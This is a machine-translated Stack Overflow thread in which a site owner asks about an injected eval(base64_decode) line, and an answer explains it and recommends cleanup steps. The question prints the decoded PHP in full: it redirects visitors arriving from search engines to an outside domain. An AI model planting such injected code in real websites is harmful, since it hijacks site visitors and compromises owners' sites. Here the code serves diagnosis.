2011-07-10 6 views
-4

バックエンドのページをハックラインを注入されているようだ - はeval(BASE64_DECODE(「CgplcnJvcl9yZXBvcnRpbmcoMCk7C ...のeval(BASE64_DECODEは、私が働いている

とbase64文字列が

error_reporting(0); 
$nccv=headers_sent(); 
if (!$nccv){ 
    $referer=$_SERVER['HTTP_REFERER']; 

    if (stristr($referer,"aol.com") 
    or stristr($referer,"yahoo") 
    or stristr($referer,"google") 
    or stristr($referer,"bing") 
    or stristr($referer,"ask.com") 
    or stristr($referer,"msn") 
    or stristr($referer,"live") 
    or stristr($referer,"facebook") 
) { 
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")) { 
     header("Location: http://lovemypants.co.cc/"); 
     exit(); 
    } 
    } 
} 
にデコードします

この質問を書いている時点では、私はプログラミングとSOの両方のノブであり、コードの意味とその影響について知りたがっています。

+2

申し訳ありませんが、私は疑問を得ることはありません。 – mauris

+0

あなたの訪問者はlovemypants.co.ccにリダイレクトされます。しかし、私はここに本当の質問を見ない? – knittl

+1

です。バックアップなし?? –

答えて

6

あなたは、リスク分析を探していたら、私はあなたに言うことができます実際の訪問であり、検索エンジンからリダイレクトされない場合、e「ハック」は訪問者をlovemypants.co.ccにリダイレクトするだけです。

...を、ハックを削除し、あなたのパスワードを変更し、セットアップ公開鍵認証を、あなたのサーバーは、彼らがやっていることを知っている誰かによって保護を受ける、と定期的なバックアップはを設定します。

(次回ください実際は、質問をお書きください。)

関連する問題